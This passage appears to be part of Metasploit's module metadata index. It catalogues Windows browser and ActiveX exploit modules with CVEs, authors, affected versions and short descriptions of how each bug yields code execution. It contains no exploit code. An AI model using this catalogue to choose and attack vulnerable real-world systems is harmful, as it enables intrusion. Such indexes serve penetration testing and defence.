"exploit_windows/browser/cisco_playerpt_setsource": {
"name": "Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/cisco_playerpt_setsource",
"rank": 300,
"disclosure_date": "2012-03-22",
"type": "exploit",
"author": [
"rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15\n as installed with the web interface of the Cisco Linksys WVC200 Wireless-G PTZ\n Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in\n the SetSource method, allows triggering a stack based buffer overflow which leads\n to code execution under the context of the user visiting a malicious web page.",
"references": [
"CVE-2012-0284",
"OSVDB-80297",
"EDB-18641"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Windows Vista SP2",
"IE 8 on Windows XP SP3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/browser/cisco_playerpt_setsource.rb",
"is_install_path": true,
"ref_name": "windows/browser/cisco_playerpt_setsource",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/cisco_playerpt_setsource_surl": {
"name": "Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow",
"full_name": "exploit/windows/browser/cisco_playerpt_setsource_surl",
"rank": 300,
"disclosure_date": "2012-07-17",
"type": "exploit",
"author": [
"Carsten Eiram",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15\n as installed with the web interface of the Cisco Linksys WVC200 Wireless-G PTZ\n Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in\n the SetSource method, when handling a specially crafted sURL argument, allows\n triggering a stack based buffer overflow which leads to code execution under the\n context of the user visiting a malicious web page.",
"references": [
"CVE-2012-0284",
"OSVDB-84309",
"BID-54588",
"URL-http://secunia.com/secunia_research/2012-25/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Windows Vista SP2",
"IE 8 on Windows XP SP3",
"IE 8 with Java 6 on Windows XP SP3",
"IE 8 with Java 6 on Windows 7 SP1/Vista SP2",
"IE 9 with Java 6 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb",
"is_install_path": true,
"ref_name": "windows/browser/cisco_playerpt_setsource_surl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/cisco_webex_ext": {
"name": "Cisco WebEx Chrome Extension RCE (CVE-2017-3823)",
"full_name": "exploit/windows/browser/cisco_webex_ext",
"rank": 500,
"disclosure_date": "2017-01-21",
"type": "exploit",
"author": [
"Tavis Ormandy <taviso@google.com>",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits a vulnerability present in the Cisco WebEx Chrome Extension\n version 1.0.1 which allows an attacker to execute arbitrary commands on a system.",
"references": [
"CVE-2017-3823"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Cisco WebEx Extension 1.0.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/cisco_webex_ext.rb",
"is_install_path": true,
"ref_name": "windows/browser/cisco_webex_ext",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/citrix_gateway_actx": {
"name": "Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability",
"full_name": "exploit/windows/browser/citrix_gateway_actx",
"rank": 300,
"disclosure_date": "2011-07-14",
"type": "exploit",
"author": [
"Michal Trojnara",
"bannedit <bannedit@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in the Citrix Gateway\n ActiveX control. Exploitation of this vulnerability requires user interaction.\n The victim must click a button in a dialog to begin a scan. This is typical\n interaction that users should be accustomed to.\n\n Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.",
"references": [
"CVE-2011-2882",
"OSVDB-74191",
"URL-https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=929"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/citrix_gateway_actx.rb",
"is_install_path": true,
"ref_name": "windows/browser/citrix_gateway_actx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/clear_quest_cqole": {
"name": "IBM Rational ClearQuest CQOle Remote Code Execution",
"full_name": "exploit/windows/browser/clear_quest_cqole",
"rank": 300,
"disclosure_date": "2012-05-19",
"type": "exploit",
"author": [
"Andrea Micalizzi aka rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a function prototype mismatch on the CQOle ActiveX\n control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which\n allows reliable remote code execution when DEP isn't enabled.",
"references": [
"CVE-2012-0708",
"BID-53170",
"OSVDB-81443",
"ZDI-12-113",
"URL-http://www-304.ibm.com/support/docview.wss?uid=swg21591705",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/07/11/it-isnt-always-about-buffer-overflow"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 / IE7 (No DEP)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/clear_quest_cqole.rb",
"is_install_path": true,
"ref_name": "windows/browser/clear_quest_cqole",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/communicrypt_mail_activex": {
"name": "CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow",
"full_name": "exploit/windows/browser/communicrypt_mail_activex",
"rank": 500,
"disclosure_date": "2010-05-19",
"type": "exploit",
"author": [
"Lincoln",
"dookie"
],
"description": "This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll\n ActiveX Control provided by CommuniCrypt Mail 1.16. By sending an overly\n long string to the \"AddAttachments()\" method, an attacker may be able to\n execute arbitrary code.",
"references": [
"OSVDB-64839",
"EDB-12663"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/communicrypt_mail_activex.rb",
"is_install_path": true,
"ref_name": "windows/browser/communicrypt_mail_activex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/creative_software_cachefolder": {
"name": "Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/creative_software_cachefolder",
"rank": 300,
"disclosure_date": "2008-05-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When\n sending an overly long string to the cachefolder() property of CTSUEng.ocx,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-0955",
"OSVDB-45655"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/creative_software_cachefolder.rb",
"is_install_path": true,
"ref_name": "windows/browser/creative_software_cachefolder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/crystal_reports_printcontrol": {
"name": "Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",
"full_name": "exploit/windows/browser/crystal_reports_printcontrol",
"rank": 300,
"disclosure_date": "2010-12-14",
"type": "exploit",
"author": [
"Dmitriy Pletnev",
"Dr_IDE",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap based buffer overflow in the CrystalPrintControl\n ActiveX, while handling the ServerResourceVersion property. The affected control\n can be found in the PrintControl.dll component as included with Crystal Reports\n 2008. This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3\n and IE 8 on Windows 7 SP1. The module uses the msvcr71.dll library, loaded by the\n affected ActiveX control, to bypass DEP and ASLR.",
"references": [
"CVE-2010-2590",
"OSVDB-69917",
"BID-45387",
"EDB-15733"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/crystal_reports_printcontrol.rb",
"is_install_path": true,
"ref_name": "windows/browser/crystal_reports_printcontrol",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/dell_webcam_crazytalk": {
"name": "Dell Webcam CrazyTalk ActiveX BackImage Vulnerability",
"full_name": "exploit/windows/browser/dell_webcam_crazytalk",
"rank": 300,
"disclosure_date": "2012-03-19",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Dell Webcam's CrazyTalk component.\n Specifically, when supplying a long string for a file path to the BackImage\n property, an overflow may occur after checking certain file extension names,\n resulting in remote code execution under the context of the user.",
"references": [
"URL-http://www.dell.com/support/drivers/us/en/04/DriverDetails/DriverFileFormats?c=us&l=en&s=bsd&cs=04&DriverId=R230103",
"EDB-18621",
"OSVDB-80205"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/dell_webcam_crazytalk.rb",
"is_install_path": true,
"ref_name": "windows/browser/dell_webcam_crazytalk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/dxstudio_player_exec": {
"name": "Worldweaver DX Studio Player shell.execute() Command Execution",
"full_name": "exploit/windows/browser/dxstudio_player_exec",
"rank": 600,
"disclosure_date": "2009-06-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command execution vulnerability within the DX\n Studio Player from Worldweaver for versions 3.0.29 and earlier. The\n player is a browser plugin for IE (ActiveX) and Firefox (dll). When an\n unsuspecting user visits a web page referring to a specially crafted\n .dxstudio document, an attacker can execute arbitrary commands.\n\n Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20\n and IE 6 on Windows XP SP3. In IE, the user will be prompted if they\n wish to allow the plug-in to access local files. This prompt appears to\n occur only once per server host.\n\n NOTE: This exploit uses additionally dangerous script features to write\n to local files!",
"references": [
"CVE-2009-2011",
"BID-35273",
"OSVDB-54969",
"EDB-8922",
"URL-http://dxstudio.com/guide.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/dxstudio_player_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/dxstudio_player_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ea_checkrequirements": {
"name": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/ea_checkrequirements",
"rank": 300,
"disclosure_date": "2007-10-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl\n ActiveX Control (NPSnpy.dll 1.1.0.36). When sending an overly long\n string to the CheckRequirements() method, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2007-4466",
"OSVDB-37723"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ea_checkrequirements.rb",
"is_install_path": true,
"ref_name": "windows/browser/ea_checkrequirements",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ebook_flipviewer_fviewerloading": {
"name": "FlipViewer FViewerLoading ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/ebook_flipviewer_fviewerloading",
"rank": 300,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>"
],
"description": "This module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0.\n The vulnerability is caused due to a boundary error in the\n FViewerLoading (FlipViewerX.dll) ActiveX control when handling the\n \"LoadOpf()\" method.",
"references": [
"CVE-2007-2919",
"OSVDB-37042",
"BID-24328"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb",
"is_install_path": true,
"ref_name": "windows/browser/ebook_flipviewer_fviewerloading",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/enjoysapgui_comp_download": {
"name": "EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",
"full_name": "exploit/windows/browser/enjoysapgui_comp_download",
"rank": 600,
"disclosure_date": "2009-04-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a user's file system\n by abusing the \"Comp_Download\" method in the SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41).",
"references": [
"CVE-2008-4830",
"OSVDB-53680",
"URL-http://dsecrg.com/files/pub/pdf/HITB%20-%20Attacking%20SAP%20Users%20with%20Sapsploit.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/enjoysapgui_comp_download.rb",
"is_install_path": true,
"ref_name": "windows/browser/enjoysapgui_comp_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/enjoysapgui_preparetoposthtml": {
"name": "EnjoySAP SAP GUI ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/enjoysapgui_preparetoposthtml",
"rank": 300,
"disclosure_date": "2007-07-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SAP KWEdit ActiveX\n Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending\n an overly long string to the \"PrepareToPostHTML()\" method, an attacker\n may be able to execute arbitrary code.",
"references": [
"CVE-2007-3605",
"OSVDB-37690",
"BID-24772"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP0/SP1 English",
"Windows 2000 Pro English All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb",
"is_install_path": true,
"ref_name": "windows/browser/enjoysapgui_preparetoposthtml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/exodus": {
"name": "Exodus Wallet (ElectronJS Framework) remote Code Execution",
"full_name": "exploit/windows/browser/exodus",
"rank": 0,
"disclosure_date": "2018-01-25",
"type": "exploit",
"author": [
"Wflki",
"Daniel Teixeira"
],
"description": "This module exploits a Remote Code Execution vulnerability in Exodus Wallet.\n A vulnerability in the ElectronJS Framework protocol handler can be used to\n get arbitrary command execution if the user clicks on a specially crafted URL.",
"references": [
"EDB-43899",
"BID-102796",
"CVE-2018-1000006"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PSH (Binary)"
],
"mod_time": "2018-02-28 11:04:16 +0000",
"path": "/modules/exploits/windows/browser/exodus.rb",
"is_install_path": true,
"ref_name": "windows/browser/exodus",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/facebook_extractiptc": {
"name": "Facebook Photo Uploader 4 ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/facebook_extractiptc",
"rank": 300,
"disclosure_date": "2008-01-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Facebook Photo Uploader 4.\n By sending an overly long string to the \"ExtractIptc()\" property located\n in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-5711",
"OSVDB-41073",
"BID-27534",
"EDB-5049"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 6 SP0-SP2 / Windows XP SP2 Pro English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/facebook_extractiptc.rb",
"is_install_path": true,
"ref_name": "windows/browser/facebook_extractiptc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/firefox_smil_uaf": {
"name": "Firefox nsSMILTimeContainer::NotifyTimeChange() RCE",
"full_name": "exploit/windows/browser/firefox_smil_uaf",
"rank": 300,
"disclosure_date": "2016-11-30",
"type": "exploit",
"author": [
"Anonymous Gaijin",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits an out-of-bounds indexing/use-after-free condition present in\n nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox\n on Microsoft Windows.",
"references": [
"CVE-2016-9079",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=1321066",
"URL-https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mozilla Firefox 38 to 41"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/firefox_smil_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/firefox_smil_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/foxit_reader_plugin_url_bof": {
"name": "Foxit Reader Plugin URL Processing Buffer Overflow",
"full_name": "exploit/windows/browser/foxit_reader_plugin_url_bof",
"rank": 300,
"disclosure_date": "2013-01-07",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"Sven Krewitt <svnk@krewitt.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Foxit Reader Plugin, which exists in\n the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,\n overly long query strings within URLs can cause a stack-based buffer overflow,\n which can be exploited to execute arbitrary code. This exploit has been tested\n on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281\n (npFoxitReaderPlugin.dll version 2.2.1.530).",
"references": [
"OSVDB-89030",
"BID-57174",
"EDB-23944",
"URL-http://secunia.com/advisories/51733/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/foxit_reader_plugin_url_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/getgodm_http_response_bof": {
"name": "GetGo Download Manager HTTP Response Buffer Overflow",
"full_name": "exploit/windows/browser/getgodm_http_response_bof",
"rank": 300,
"disclosure_date": "2014-03-09",
"type": "exploit",
"author": [
"Julien Ahrens",
"Gabor Seljan",
"bzyo",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n GetGo Download Manager version 5.3.0.2712 and earlier, caused by an\n overly long HTTP response header.\n\n By persuading the victim to download a file from a malicious server, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3.",
"references": [
"EDB-32132",
"OSVDB-103910",
"CVE-2014-2206"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"4.9.0.1982 on Windows XP SP3",
"5.3.0.2712 on Windows XP SP3"
],
"mod_time": "2018-11-29 17:29:05 +0000",
"path": "/modules/exploits/windows/browser/getgodm_http_response_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/getgodm_http_response_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/gom_openurl": {
"name": "GOM Player ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/gom_openurl",
"rank": 300,
"disclosure_date": "2007-10-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in GOM Player 2.1.6.3499.\n By sending an overly long string to the \"OpenUrl()\" method located\n in the GomWeb3.dll Control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-5779",
"OSVDB-38282",
"URL-http://secunia.com/advisories/27418/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 Pro English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/gom_openurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/gom_openurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/greendam_url": {
"name": "Green Dam URL Processing Buffer Overflow",
"full_name": "exploit/windows/browser/greendam_url",
"rank": 300,
"disclosure_date": "2009-06-11",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in Green Dam Youth Escort\n version 3.17 in the way it handles overly long URLs.\n By setting an overly long URL, an attacker can overrun a buffer and execute\n arbitrary code. This module uses the .NET DLL memory technique by Alexander\n Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.",
"references": [
"OSVDB-55126",
"URL-http://www.cse.umich.edu/~jhalderm/pub/gd/",
"EDB-8938",
"URL-http://taossa.com/archive/bh08sotirovdowd.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/greendam_url.rb",
"is_install_path": true,
"ref_name": "windows/browser/greendam_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/honeywell_hscremotedeploy_exec": {
"name": "Honeywell HSC Remote Deployer ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/honeywell_hscremotedeploy_exec",
"rank": 600,
"disclosure_date": "2013-02-22",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the Honeywell HSC Remote Deployer\n ActiveX. This control can be abused by using the LaunchInstaller() function to\n execute an arbitrary HTA from a remote location. This module has been tested\n successfully with the HSC Remote Deployer ActiveX installed with Honeywell EBI\n R410.1.",
"references": [
"CVE-2013-0108",
"OSVDB-90583",
"BID-58134",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi",
"URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/honeywell_hscremotedeploy_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/honeywell_tema_exec": {
"name": "Honeywell Tema Remote Installer ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/honeywell_tema_exec",
"rank": 600,
"disclosure_date": "2011-10-20",
"type": "exploit",
"author": [
"Billy Rios",
"Terry McCorkle",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the Honeywell Tema ActiveX Remote\n Installer. This ActiveX control can be abused by using the DownloadFromURL()\n function to install an arbitrary MSI from a remote location without checking source\n authenticity or user notification. This module has been tested successfully with\n the Remote Installer ActiveX installed with Honeywell EBI R410.1 - TEMA 5.3.0 and\n Internet Explorer 6, 7 and 8 on Windows XP SP3.",
"references": [
"OSVDB-76681",
"BID-50078",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-285-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/honeywell_tema_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/honeywell_tema_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_alm_xgo_setshapenodetype_exec": {
"name": "HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",
"full_name": "exploit/windows/browser/hp_alm_xgo_setshapenodetype_exec",
"rank": 300,
"disclosure_date": "2012-08-29",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability within the XGO.ocx ActiveX Control\n installed with the HP Application Lifecycle Manager Client. The vulnerability\n exists in the SetShapeNodeType method, which allows the user to specify memory\n that will be used as an object, through the node parameter. This allows an attacker\n to control the dereference and use of a function pointer. This module has been successfully\n tested with HP Application Lifecycle Manager 11.50 and requires JRE 6 in order to\n bypass DEP and ASLR.",
"references": [
"OSVDB-85152",
"BID-55272",
"ZDI-12-170"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_alm_xgo_setshapenodetype_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_easy_printer_care_xmlcachemgr": {
"name": "HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",
"full_name": "exploit/windows/browser/hp_easy_printer_care_xmlcachemgr",
"rank": 500,
"disclosure_date": "2012-01-11",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a user's file\n system by abusing the \"CacheDocumentXMLWithId\" method from the \"XMLCacheMgr\"\n class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll\n 2.7.2.0).\n\n Code execution can be achieved by first uploading the payload to the remote\n machine embedded in a vbs file, and then uploading another mof file, which enables the\n Windows Management Instrumentation service to execute the vbs. Please note that\n this module currently only works for Windows before Vista.",
"references": [
"CVE-2011-4786",
"OSVDB-78306",
"BID-51396",
"ZDI-12-013"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_easy_printer_care_xmlcachemgr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_easy_printer_care_xmlsimpleaccessor": {
"name": "HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",
"full_name": "exploit/windows/browser/hp_easy_printer_care_xmlsimpleaccessor",
"rank": 500,
"disclosure_date": "2011-08-16",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a user's file\n system by abusing, via a directory traversal attack, the \"saveXML\" method from the\n \"XMLSimpleAccessor\" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control\n (HPTicketMgr.dll 2.7.2.0).\n\n Code execution can be achieved by first uploading the payload to the remote\n machine embedded in a vbs file, and then uploading another mof file, which enables the Windows\n Management Instrumentation service to execute the vbs. Please note that this\n module currently only works for Windows before Vista.",
"references": [
"CVE-2011-2404",
"OSVDB-74510",
